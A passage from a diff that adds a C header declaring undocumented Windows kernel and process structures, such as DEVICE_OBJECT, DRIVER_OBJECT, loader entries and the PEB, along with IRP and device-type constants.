ThreadReserved; + union { + UCHAR ThreadControlFlags; + struct { + UCHAR CycleProfiling : 1; + UCHAR CounterProfiling : 1; + UCHAR GroupScheduling : 1; + UCHAR AffinitySet : 1; + UCHAR ThreadReservedControlFlags : 4; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; + + union { + UCHAR DebugActive; + +#if !defined(_X86_) + + struct { + BOOLEAN ActiveDR7 : 1; + BOOLEAN Instrumented : 1; + BOOLEAN Minimal : 1; + BOOLEAN Reserved4 : 3; + BOOLEAN UmsScheduled : 1; + BOOLEAN UmsPrimary : 1; + } DUMMYSTRUCTNAME; + +#endif + + } DUMMYUNIONNAME2; + } DUMMYSTRUCTNAME5; + + 
struct { // Mutant + UCHAR MutantType; + UCHAR MutantSize; + BOOLEAN DpcActive; + UCHAR MutantReserved; + } DUMMYSTRUCTNAME6; + } DUMMYUNIONNAME; + + LONG SignalState; // Object lock + LIST_ENTRY WaitListHead; // Object lock +} DISPATCHER_HEADER, *PDISPATCHER_HEADER; + +typedef struct _KEVENT { + DISPATCHER_HEADER Header; +} KEVENT, *PKEVENT, *PRKEVENT; + +typedef struct _KMUTANT { + DISPATCHER_HEADER Header; + LIST_ENTRY MutantListEntry; + struct _KTHREAD *OwnerThread; + BOOLEAN Abandoned; + UCHAR ApcDisable; +} KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX; + +typedef struct _KSEMAPHORE { + DISPATCHER_HEADER Header; + LONG Limit; +} KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE; + +typedef struct _KTIMER { + DISPATCHER_HEADER Header; + ULARGE_INTEGER DueTime; + LIST_ENTRY TimerListEntry; + struct _KDPC *Dpc; + ULONG Processor; + LONG Period; +} KTIMER, *PKTIMER, *PRKTIMER; + +typedef struct _KDEVICE_QUEUE_ENTRY { + LIST_ENTRY DeviceListEntry; + ULONG SortKey; + BOOLEAN Inserted; +} KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY; + +typedef enum _KDPC_IMPORTANCE { + LowImportance, + MediumImportance, + HighImportance +} KDPC_IMPORTANCE; + +typedef struct _KDPC { + union { + ULONG TargetInfoAsUlong; + struct { + UCHAR Type; + UCHAR Importance; + volatile USHORT Number; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; + + SINGLE_LIST_ENTRY DpcListEntry; + KAFFINITY ProcessorHistory; + PVOID DeferredRoutine; + PVOID DeferredContext; + PVOID SystemArgument1; + PVOID SystemArgument2; + __volatile PVOID DpcData; +} KDPC, *PKDPC, *PRKDPC; + +typedef struct _WAIT_CONTEXT_BLOCK { + union { + KDEVICE_QUEUE_ENTRY WaitQueueEntry; + struct { + LIST_ENTRY DmaWaitEntry; + ULONG NumberOfChannels; + ULONG SyncCallback : 1; + ULONG DmaContext : 1; + ULONG Reserved : 30; + }; + }; + PVOID DeviceRoutine; + PVOID DeviceContext; + ULONG NumberOfMapRegisters; + PVOID DeviceObject; + PVOID CurrentIrp; + PKDPC BufferChainingDpc; +} WAIT_CONTEXT_BLOCK, 
*PWAIT_CONTEXT_BLOCK; + +#define MAXIMUM_VOLUME_LABEL_LENGTH (32 * sizeof(WCHAR)) // 32 characters + +typedef struct _VPB { + CSHORT Type; + CSHORT Size; + USHORT Flags; + USHORT VolumeLabelLength; // in bytes + struct _DEVICE_OBJECT *DeviceObject; + struct _DEVICE_OBJECT *RealDevice; + ULONG SerialNumber; + ULONG ReferenceCount; + WCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)]; +} VPB, *PVPB; + +typedef struct _KQUEUE { + DISPATCHER_HEADER Header; + LIST_ENTRY EntryListHead; + ULONG CurrentCount; + ULONG MaximumCount; + LIST_ENTRY ThreadListHead; +} KQUEUE, *PKQUEUE; + +typedef struct _KDEVICE_QUEUE { + CSHORT Type; + CSHORT Size; + LIST_ENTRY DeviceListHead; + KSPIN_LOCK Lock; + +#if defined(_AMD64_) + + union { + BOOLEAN Busy; + struct { + LONG64 Reserved : 8; + LONG64 Hint : 56; + }; + }; + +#else + + BOOLEAN Busy; + +#endif + +} KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE; + +enum _KOBJECTS { + EventNotificationObject = 0x0, + EventSynchronizationObject = 0x1, + MutantObject = 0x2, + ProcessObject = 0x3, + QueueObject = 0x4, + SemaphoreObject = 0x5, + ThreadObject = 0x6, + GateObject = 0x7, + TimerNotificationObject = 0x8, + TimerSynchronizationObject = 0x9, + Spare2Object = 0xa, + Spare3Object = 0xb, + Spare4Object = 0xc, + Spare5Object = 0xd, + Spare6Object = 0xe, + Spare7Object = 0xf, + Spare8Object = 0x10, + Spare9Object = 0x11, + ApcObject = 0x12, + DpcObject = 0x13, + DeviceQueueObject = 0x14, + EventPairObject = 0x15, + InterruptObject = 0x16, + ProfileObject = 0x17, + ThreadedDpcObject = 0x18, + MaximumKernelObject = 0x19, +}; + +#define DO_VERIFY_VOLUME 0x00000002 // ntddk nthal ntifs wdm +#define DO_BUFFERED_IO 0x00000004 // ntddk nthal ntifs wdm +#define DO_EXCLUSIVE 0x00000008 // ntddk nthal ntifs wdm +#define DO_DIRECT_IO 0x00000010 // ntddk nthal ntifs wdm +#define DO_MAP_IO_BUFFER 0x00000020 // ntddk nthal ntifs wdm +#define DO_DEVICE_HAS_NAME 0x00000040 // ntddk nthal ntifs +#define DO_DEVICE_INITIALIZING 0x00000080 // 
ntddk nthal ntifs wdm +#define DO_SYSTEM_BOOT_PARTITION 0x00000100 // ntddk nthal ntifs +#define DO_LONG_TERM_REQUESTS 0x00000200 // ntddk nthal ntifs +#define DO_NEVER_LAST_DEVICE 0x00000400 // ntddk nthal ntifs +#define DO_SHUTDOWN_REGISTERED 0x00000800 // ntddk nthal ntifs wdm +#define DO_BUS_ENUMERATED_DEVICE 0x00001000 // ntddk nthal ntifs wdm +#define DO_POWER_PAGABLE 0x00002000 // ntddk nthal ntifs wdm +#define DO_POWER_INRUSH 0x00004000 // ntddk nthal ntifs wdm +#define DO_POWER_NOOP 0x00008000 +#define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs +#define DO_XIP 0x00020000 + +#define FILE_REMOVABLE_MEDIA 0x00000001 +#define FILE_READ_ONLY_DEVICE 0x00000002 +#define FILE_FLOPPY_DISKETTE 0x00000004 +#define FILE_WRITE_ONCE_MEDIA 0x00000008 +#define FILE_REMOTE_DEVICE 0x00000010 +#define FILE_DEVICE_IS_MOUNTED 0x00000020 +#define FILE_VIRTUAL_VOLUME 0x00000040 +#define FILE_AUTOGENERATED_DEVICE_NAME 0x00000080 +#define FILE_DEVICE_SECURE_OPEN 0x00000100 +#define FILE_CHARACTERISTIC_PNP_DEVICE 0x00000800 +#define FILE_CHARACTERISTIC_TS_DEVICE 0x00001000 +#define FILE_CHARACTERISTIC_WEBDAV_DEVICE 0x00002000 +#define FILE_CHARACTERISTIC_CSV 0x00010000 +#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000 +#define FILE_PORTABLE_DEVICE 0x00040000 + +#define FILE_DEVICE_BEEP 0x00000001 +#define FILE_DEVICE_CD_ROM 0x00000002 +#define FILE_DEVICE_CD_ROM_FILE_SYSTEM 0x00000003 +#define FILE_DEVICE_CONTROLLER 0x00000004 +#define FILE_DEVICE_DATALINK 0x00000005 +#define FILE_DEVICE_DFS 0x00000006 +#define FILE_DEVICE_DISK 0x00000007 +#define FILE_DEVICE_DISK_FILE_SYSTEM 0x00000008 +#define FILE_DEVICE_FILE_SYSTEM 0x00000009 +#define FILE_DEVICE_INPORT_PORT 0x0000000a +#define FILE_DEVICE_KEYBOARD 0x0000000b +#define FILE_DEVICE_MAILSLOT 0x0000000c +#define FILE_DEVICE_MIDI_IN 0x0000000d +#define FILE_DEVICE_MIDI_OUT 0x0000000e +#define FILE_DEVICE_MOUSE 0x0000000f +#define FILE_DEVICE_MULTI_UNC_PROVIDER 0x00000010 +#define FILE_DEVICE_NAMED_PIPE 
0x00000011 +#define FILE_DEVICE_NETWORK 0x00000012 +#define FILE_DEVICE_NETWORK_BROWSER 0x00000013 +#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014 +#define FILE_DEVICE_NULL 0x00000015 +#define FILE_DEVICE_PARALLEL_PORT 0x00000016 +#define FILE_DEVICE_PHYSICAL_NETCARD 0x00000017 +#define FILE_DEVICE_PRINTER 0x00000018 +#define FILE_DEVICE_SCANNER 0x00000019 +#define FILE_DEVICE_SERIAL_MOUSE_PORT 0x0000001a +#define FILE_DEVICE_SERIAL_PORT 0x0000001b +#define FILE_DEVICE_SCREEN 0x0000001c +#define FILE_DEVICE_SOUND 0x0000001d +#define FILE_DEVICE_STREAMS 0x0000001e +#define FILE_DEVICE_TAPE 0x0000001f +#define FILE_DEVICE_TAPE_FILE_SYSTEM 0x00000020 +#define FILE_DEVICE_TRANSPORT 0x00000021 +#define FILE_DEVICE_UNKNOWN 0x00000022 +#define FILE_DEVICE_VIDEO 0x00000023 +#define FILE_DEVICE_VIRTUAL_DISK 0x00000024 +#define FILE_DEVICE_WAVE_IN 0x00000025 +#define FILE_DEVICE_WAVE_OUT 0x00000026 +#define FILE_DEVICE_8042_PORT 0x00000027 +#define FILE_DEVICE_NETWORK_REDIRECTOR 0x00000028 +#define FILE_DEVICE_BATTERY 0x00000029 +#define FILE_DEVICE_BUS_EXTENDER 0x0000002a +#define FILE_DEVICE_MODEM 0x0000002b +#define FILE_DEVICE_VDM 0x0000002c +#define FILE_DEVICE_MASS_STORAGE 0x0000002d +#define FILE_DEVICE_SMB 0x0000002e +#define FILE_DEVICE_KS 0x0000002f +#define FILE_DEVICE_CHANGER 0x00000030 +#define FILE_DEVICE_SMARTCARD 0x00000031 +#define FILE_DEVICE_ACPI 0x00000032 +#define FILE_DEVICE_DVD 0x00000033 +#define FILE_DEVICE_FULLSCREEN_VIDEO 0x00000034 +#define FILE_DEVICE_DFS_FILE_SYSTEM 0x00000035 +#define FILE_DEVICE_DFS_VOLUME 0x00000036 +#define FILE_DEVICE_SERENUM 0x00000037 +#define FILE_DEVICE_TERMSRV 0x00000038 +#define FILE_DEVICE_KSEC 0x00000039 +#define FILE_DEVICE_FIPS 0x0000003A +#define FILE_DEVICE_INFINIBAND 0x0000003B +#define FILE_DEVICE_VMBUS 0x0000003E +#define FILE_DEVICE_CRYPT_PROVIDER 0x0000003F +#define FILE_DEVICE_WPD 0x00000040 +#define FILE_DEVICE_BLUETOOTH 0x00000041 +#define FILE_DEVICE_MT_COMPOSITE 0x00000042 +#define 
FILE_DEVICE_MT_TRANSPORT 0x00000043 +#define FILE_DEVICE_BIOMETRIC 0x00000044 +#define FILE_DEVICE_PMI 0x00000045 +#define FILE_DEVICE_EHSTOR 0x00000046 +#define FILE_DEVICE_DEVAPI 0x00000047 +#define FILE_DEVICE_GPIO 0x00000048 +#define FILE_DEVICE_USBEX 0x00000049 +#define FILE_DEVICE_CONSOLE 0x00000050 +#define FILE_DEVICE_NFP 0x00000051 +#define FILE_DEVICE_SYSENV 0x00000052 +#define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053 +#define FILE_DEVICE_POINT_OF_SERVICE 0x00000054 + +#define FILE_BYTE_ALIGNMENT 0x00000000 +#define FILE_WORD_ALIGNMENT 0x00000001 +#define FILE_LONG_ALIGNMENT 0x00000003 +#define FILE_QUAD_ALIGNMENT 0x00000007 +#define FILE_OCTA_ALIGNMENT 0x0000000f +#define FILE_32_BYTE_ALIGNMENT 0x0000001f +#define FILE_64_BYTE_ALIGNMENT 0x0000003f +#define FILE_128_BYTE_ALIGNMENT 0x0000007f +#define FILE_256_BYTE_ALIGNMENT 0x000000ff +#define FILE_512_BYTE_ALIGNMENT 0x000001ff + +#define DPC_NORMAL 0 +#define DPC_THREADED 1 + +typedef struct _DEVICE_OBJECT { + CSHORT Type; + USHORT Size; + LONG ReferenceCount; + struct _DRIVER_OBJECT *DriverObject; + struct _DEVICE_OBJECT *NextDevice; + struct _DEVICE_OBJECT *AttachedDevice; + struct _IRP *CurrentIrp; + PVOID Timer; + ULONG Flags; + ULONG Characteristics; + __volatile PVPB Vpb; + PVOID DeviceExtension; + DEVICE_TYPE DeviceType; + CCHAR StackSize; + union { + LIST_ENTRY ListEntry; + WAIT_CONTEXT_BLOCK Wcb; + } Queue; + ULONG AlignmentRequirement; + KDEVICE_QUEUE DeviceQueue; + KDPC Dpc; + ULONG ActiveThreadCount; + PSECURITY_DESCRIPTOR SecurityDescriptor; + KEVENT DeviceLock; + USHORT SectorSize; + USHORT Spare1; + struct _DEVOBJ_EXTENSION * DeviceObjectExtension; + PVOID Reserved; +} DEVICE_OBJECT, *PDEVICE_OBJECT; + +typedef struct _DEVOBJ_EXTENSION { + + CSHORT Type; + USHORT Size; + + // + // Public part of the DeviceObjectExtension structure + // + + PDEVICE_OBJECT DeviceObject; // owning device object + + // end_ntddk end_nthal end_ntifs end_wdm end_ntosp + + // + // Universal Power Data - all device 
objects must have this + // + + ULONG PowerFlags; // see ntos\po\pop.h + // WARNING: Access via PO macros + // and with PO locking rules ONLY. + + // + // Pointer to the non-universal power data + // Power data that only some device objects need is stored in the + // device object power extension -> DOPE + // see po.h + // + + struct _DEVICE_OBJECT_POWER_EXTENSION *Dope; + + // + // power state information + // + + // + // Device object extension flags. Protected by the IopDatabaseLock. + // + + ULONG ExtensionFlags; + + // + // PnP manager fields + // + + PVOID DeviceNode; + + // + // AttachedTo is a pointer to the device object that this device + // object is attached to. The attachment chain is now doubly + // linked: this pointer and DeviceObject->AttachedDevice provide the + // linkage. + // + + PDEVICE_OBJECT AttachedTo; + + // + // The next two fields are used to prevent recursion in IoStartNextPacket + // interfaces. + // + + LONG StartIoCount; // Used to keep track of number of pending start ios. + LONG StartIoKey; // Next startio key + ULONG StartIoFlags; // Start Io Flags. Need a separate flag so that it can be accessed without locks + PVPB Vpb; // If not NULL contains the VPB of the mounted volume. + // Set in the filesystem's volume device object. + // This is a reverse VPB pointer. 
+ + // begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp + +} DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION; + +typedef struct _FAST_IO_DISPATCH { + ULONG SizeOfFastIoDispatch; + PVOID FastIoCheckIfPossible; + PVOID FastIoRead; + PVOID FastIoWrite; + PVOID FastIoQueryBasicInfo; + PVOID FastIoQueryStandardInfo; + PVOID FastIoLock; + PVOID FastIoUnlockSingle; + PVOID FastIoUnlockAll; + PVOID FastIoUnlockAllByKey; + PVOID FastIoDeviceControl; + PVOID AcquireFileForNtCreateSection; + PVOID ReleaseFileForNtCreateSection; + PVOID FastIoDetachDevice; + PVOID FastIoQueryNetworkOpenInfo; + PVOID AcquireForModWrite; + PVOID MdlRead; + PVOID MdlReadComplete; + PVOID PrepareMdlWrite; + PVOID MdlWriteComplete; + PVOID FastIoReadCompressed; + PVOID FastIoWriteCompressed; + PVOID MdlReadCompleteCompressed; + PVOID MdlWriteCompleteCompressed; + PVOID FastIoQueryOpen; + PVOID ReleaseForModWrite; + PVOID AcquireForCcFlush; + PVOID ReleaseForCcFlush; +} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH; + +#define IO_TYPE_ADAPTER 0x00000001 +#define IO_TYPE_CONTROLLER 0x00000002 +#define IO_TYPE_DEVICE 0x00000003 +#define IO_TYPE_DRIVER 0x00000004 +#define IO_TYPE_FILE 0x00000005 +#define IO_TYPE_IRP 0x00000006 +#define IO_TYPE_MASTER_ADAPTER 0x00000007 +#define IO_TYPE_OPEN_PACKET 0x00000008 +#define IO_TYPE_TIMER 0x00000009 +#define IO_TYPE_VPB 0x0000000a +#define IO_TYPE_ERROR_LOG 0x0000000b +#define IO_TYPE_ERROR_MESSAGE 0x0000000c +#define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d + +#define IRP_MJ_CREATE 0x00 +#define IRP_MJ_CREATE_NAMED_PIPE 0x01 +#define IRP_MJ_CLOSE 0x02 +#define IRP_MJ_READ 0x03 +#define IRP_MJ_WRITE 0x04 +#define IRP_MJ_QUERY_INFORMATION 0x05 +#define IRP_MJ_SET_INFORMATION 0x06 +#define IRP_MJ_QUERY_EA 0x07 +#define IRP_MJ_SET_EA 0x08 +#define IRP_MJ_FLUSH_BUFFERS 0x09 +#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a +#define IRP_MJ_SET_VOLUME_INFORMATION 0x0b +#define IRP_MJ_DIRECTORY_CONTROL 0x0c +#define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d +#define IRP_MJ_DEVICE_CONTROL 
0x0e +#define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f +#define IRP_MJ_SHUTDOWN 0x10 +#define IRP_MJ_LOCK_CONTROL 0x11 +#define IRP_MJ_CLEANUP 0x12 +#define IRP_MJ_CREATE_MAILSLOT 0x13 +#define IRP_MJ_QUERY_SECURITY 0x14 +#define IRP_MJ_SET_SECURITY 0x15 +#define IRP_MJ_POWER 0x16 +#define IRP_MJ_SYSTEM_CONTROL 0x17 +#define IRP_MJ_DEVICE_CHANGE 0x18 +#define IRP_MJ_QUERY_QUOTA 0x19 +#define IRP_MJ_SET_QUOTA 0x1a +#define IRP_MJ_PNP 0x1b +#define IRP_MJ_PNP_POWER IRP_MJ_PNP +#define IRP_MJ_MAXIMUM_FUNCTION 0x1b + +typedef struct _DRIVER_EXTENSION { + + // + // Back pointer to Driver Object + // + + struct _DRIVER_OBJECT *DriverObject; + + // + // The AddDevice entry point is called by the Plug & Play manager + // to inform the driver when a new device instance arrives that this + // driver must control. + // + + PVOID AddDevice; + + // + // The count field is used to count the number of times the driver has + // had its registered reinitialization routine invoked. + // + + ULONG Count; + + // + // The service name field is used by the pnp manager to determine + // where the driver related info is stored in the registry. + // + + UNICODE_STRING ServiceKeyName; + +} DRIVER_EXTENSION, *PDRIVER_EXTENSION; + +#define DRVO_UNLOAD_INVOKED 0x00000001 +#define DRVO_LEGACY_DRIVER 0x00000002 +#define DRVO_BUILTIN_DRIVER 0x00000004 // Driver objects for Hal, PnP Mgr +#define DRVO_REINIT_REGISTERED 0x00000008 +#define DRVO_INITIALIZED 0x00000010 +#define DRVO_BOOTREINIT_REGISTERED 0x00000020 +#define DRVO_LEGACY_RESOURCES 0x00000040 +// end_ntddk end_nthal end_ntifs end_ntosp +#define DRVO_BASE_FILESYSTEM_DRIVER 0x00000080 // A driver that is at the bottom of the filesystem stack. +// begin_ntddk begin_nthal begin_ntifs begin_ntosp + +typedef struct _DRIVER_OBJECT { + CSHORT Type; + CSHORT Size; + + // + // The following links all of the devices created by a single driver + // together on a list, and the Flags word provides an extensible flag + // location for driver objects. 
+ // + + PDEVICE_OBJECT DeviceObject; + ULONG Flags; + + // + // The following section describes where the driver is loaded. The count + // field is used to count the number of times the driver has had its + // registered reinitialization routine invoked. + // + + PVOID DriverStart; + ULONG DriverSize; + PVOID DriverSection; //PLDR_DATA_TABLE_ENTRY + PDRIVER_EXTENSION DriverExtension; + + // + // The driver name field is used by the error log thread + // determine the name of the driver that an I/O request is/was bound. + // + + UNICODE_STRING DriverName; + + // + // The following section is for registry support. Thise is a pointer + // to the path to the hardware information in the registry + // + + PUNICODE_STRING HardwareDatabase; + + // + // The following section contains the optional pointer to an array of + // alternate entry points to a driver for "fast I/O" support. Fast I/O + // is performed by invoking the driver routine directly with separate + // parameters, rather than using the standard IRP call mechanism. Note + // that these functions may only be used for synchronous I/O, and when + // the file is cached. + // + + PFAST_IO_DISPATCH FastIoDispatch; + + // + // The following section describes the entry points to this particular + // driver. Note that the major function dispatch table must be the last + // field in the object so that it remains extensible. 
+ // + + PVOID DriverInit; + PVOID DriverStartIo; + PVOID DriverUnload; + PVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1]; + +} DRIVER_OBJECT; +typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT; + +typedef struct _LDR_RESOURCE_INFO { + ULONG_PTR Type; + ULONG_PTR Name; + ULONG Lang; +} LDR_RESOURCE_INFO, *PLDR_RESOURCE_INFO; + +typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE { + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + union + { + LIST_ENTRY InInitializationOrderLinks; + LIST_ENTRY InProgressLinks; + } DUMMYUNION0; + PVOID DllBase; + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + WORD ObsoleteLoadCount; + WORD TlsIndex; + union + { + LIST_ENTRY HashLinks; + struct + { + PVOID SectionPointer; + ULONG CheckSum; + }; + } DUMMYUNION1; + union + { + ULONG TimeDateStamp; + PVOID LoadedImports; + } DUMMYUNION2; + //fields below removed for compatibility +} LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE; +typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY; +typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE *PLDR_DATA_TABLE_ENTRY; +typedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY; + +/* +* WDM END +*/ + +/* +* NTQSI Modules START +*/ + +typedef struct _RTL_PROCESS_MODULE_INFORMATION { + HANDLE Section; + PVOID MappedBase; + PVOID ImageBase; + ULONG ImageSize; + ULONG Flags; + USHORT LoadOrderIndex; + USHORT InitOrderIndex; + USHORT LoadCount; + USHORT OffsetToFileName; + UCHAR FullPathName[256]; +} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; + +typedef struct _RTL_PROCESS_MODULES { + ULONG NumberOfModules; + RTL_PROCESS_MODULE_INFORMATION Modules[1]; +} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; + +/* +* NTQSI Modules END +*/ + +/* +** Virtual Memory START +*/ + +typedef enum _MEMORY_INFORMATION_CLASS +{ + MemoryBasicInformation, + MemoryWorkingSetInformation, + MemoryMappedFilenameInformation, + MemoryRegionInformation, + 
MemoryWorkingSetExInformation +} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS; + +typedef struct _MEMORY_REGION_INFORMATION { + PVOID AllocationBase; + ULONG AllocationProtect; + ULONG RegionType; + SIZE_T RegionSize; +} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION; + +/* +** Virtual Memory END +*/ + +/* +** System Firmware START +*/ + +typedef enum _SYSTEM_FIRMWARE_TABLE_ACTION +{ + SystemFirmwareTable_Enumerate, + SystemFirmwareTable_Get +} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION; + +typedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION { + ULONG ProviderSignature; + SYSTEM_FIRMWARE_TABLE_ACTION Action; + ULONG TableID; + ULONG TableBufferLength; + UCHAR TableBuffer[ANYSIZE_ARRAY]; +} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION; + +/* +** System Firmware END +*/ + +// +// PEB/TEB +// +typedef struct _PEB_LDR_DATA +{ + ULONG Length; + BOOLEAN Initialized; + HANDLE SsHandle; + LIST_ENTRY InLoadOrderModuleList; + LIST_ENTRY InMemoryOrderModuleList; + LIST_ENTRY InInitializationOrderModuleList; + PVOID EntryInProgress; + BOOLEAN ShutdownInProgress; + HANDLE ShutdownThreadId; +} PEB_LDR_DATA, *PPEB_LDR_DATA; + +typedef struct _GDI_HANDLE_ENTRY +{ + union + { + PVOID Object; + PVOID NextFree; + }; + union + { + struct + { + USHORT ProcessId; + USHORT Lock : 1; + USHORT Count : 15; + }; + ULONG Value; + } Owner; + USHORT Unique; + UCHAR Type; + UCHAR Flags; + PVOID UserPointer; +} GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY; + +#define GDI_MAX_HANDLE_COUNT 0x4000 + +typedef struct _GDI_SHARED_MEMORY +{ + GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT]; +} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY; + +#define FLS_MAXIMUM_AVAILABLE 128 +#define TLS_MINIMUM_AVAILABLE 64 +#define TLS_EXPANSION_SLOTS 1024 + +#define DOS_MAX_COMPONENT_LENGTH 255 +#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5) + +typedef struct _CURDIR +{ + UNICODE_STRING DosPath; + HANDLE Handle; +} CURDIR, *PCURDIR; + +#define 
RTL_USER_PROC_CURDIR_CLOSE 0x00000002 +#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003 + +typedef struct _RTL_DRIVE_LETTER_CURDIR +{ + USHORT Flags; + USHORT Length; + ULONG TimeStamp; + STRING DosPath; +} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; + +#define RTL_MAX_DRIVE_LETTERS 32 +#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 + +typedef struct _RTL_USER_PROCESS_PARAMETERS +{ + ULONG MaximumLength; + ULONG Length; + + ULONG Flags; + ULONG DebugFlags; + + HANDLE ConsoleHandle; + ULONG ConsoleFlags; + HANDLE StandardInput; + HANDLE StandardOutput; + HANDLE StandardError; + + CURDIR CurrentDirectory; + UNICODE_STRING DllPath; + UNICODE_STRING ImagePathName; + UNICODE_STRING CommandLine; + PVOID Environment; + + ULONG StartingX; + ULONG StartingY; + ULONG CountX; + ULONG CountY; + ULONG CountCharsX; + ULONG CountCharsY; + ULONG FillAttribute; + + ULONG WindowFlags; + ULONG ShowWindowFlags; + UNICODE_STRING WindowTitle; + UNICODE_STRING DesktopInfo; + UNICODE_STRING ShellInfo; + UNICODE_STRING RuntimeData; + RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; + + ULONG EnvironmentSize; + ULONG EnvironmentVersion; +} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; + +#define GDI_HANDLE_BUFFER_SIZE32 34 +#define GDI_HANDLE_BUFFER_SIZE64 60 + +#if !defined(_M_X64) +#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32 +#else +#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64 +#endif + +typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32]; +typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64]; +typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE]; + +typedef struct _PEB +{ + BOOLEAN InheritedAddressSpace; + BOOLEAN ReadImageFileExecOptions; + BOOLEAN BeingDebugged; + union + { + BOOLEAN BitField; + struct + { + BOOLEAN ImageUsesLargePages : 1; + BOOLEAN IsProtectedProcess : 1; + BOOLEAN IsLegacyProcess : 1; + BOOLEAN IsImageDynamicallyRelocated : 1; + BOOLEAN SkipPatchingUser32Forwarders : 1; + BOOLEAN 
SpareBits : 3;
+ };
+ };
+ HANDLE Mutant;
+
+ PVOID ImageBaseAddress;
+ PPEB_LDR_DATA Ldr;
+ PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
+ PVOID SubSystemData;
+ PVOID ProcessHeap;
+ PRTL_CRITICAL_SECTION FastPebLock;
+ PVOID AtlThunkSListPtr;
+ PVOID IFEOKey;
+ union
+ {
+ ULONG CrossProcessFlags;
+ struct
+ {
+ ULONG ProcessInJob : 1;
+ ULONG ProcessInitializing : 1;
+ ULONG ProcessUsingVEH : 1;
+ ULONG ProcessUsingVCH : 1;
+ ULONG ProcessUsingFTH : 1;
+ ULONG ReservedBits0 : 27;
+ };
+ ULONG EnvironmentUpdateCount;
+ };
+ union
+ {
+ PVOID KernelCallbackTable;
+ PVOID UserSharedInfoPtr;
+ };
+ ULONG SystemReserved[1];
+ ULONG AtlThunkSListPtr32;
+ PVOID ApiSetMap;
+ ULONG TlsExpansionCounter;
+ PVOID TlsBitmap;
+ ULONG TlsBitmapBits[2];
+ PVOID ReadOnlySharedMemoryBase;
+ PVOID HotpatchInformation;
+ PVOID *ReadOnlyStaticServerData;
+ PVOID AnsiCodePageData;
+ PVOID OemCodePageData;
+ PVOID UnicodeCaseTableData;
+
+ ULONG NumberOfProcessors;
+ ULONG NtGlobalFlag;
+
+ LARGE_INTEGER CriticalSectionTimeout;
+ SIZE_T HeapSegmentReserve;
+ SIZE_T HeapSegmentCommit;
+ SIZE_T HeapDeCommitTotalFreeThreshold;
+ SIZE_T HeapDeCommitFreeBlockThreshold;
+
+ ULONG NumberOfHeaps;
+ ULONG MaximumNumberOfHeaps;
+ PVOID *ProcessHeaps;
+
+ PVOID GdiSharedHandleTable;
+ PVOID ProcessStarterHelper;
+ ULONG GdiDCAttributeList;
+
+ PRTL_CRITICAL_SECTION LoaderLock;
+
+ ULONG OSMajorVersion;
+ ULONG OSMinorVersion;
+ USHORT OSBuildNumber;
+ USHORT OSCSDVersion;
+ ULONG OSPlatformId;
+ ULONG ImageSubsystem;
+ ULONG ImageSubsystemMajorVersion;
+ ULONG ImageSubsystemMinorVersion;
+ ULONG_PTR ImageProcessAffinityMask;
+ GDI_HANDLE_BUFFER GdiHandleBuffer;
+ PVOID PostProcessInitRoutine;
+
+ PVOID TlsExpansionBitmap;
+ ULONG TlsExpansionBitmapBits[32];
+
+ ULONG SessionId;
+
+ ULARGE_INTEGER AppCompatFlags;
+ ULARGE_INTEGER AppCompatFlagsUser;
+ PVOID pShimData;
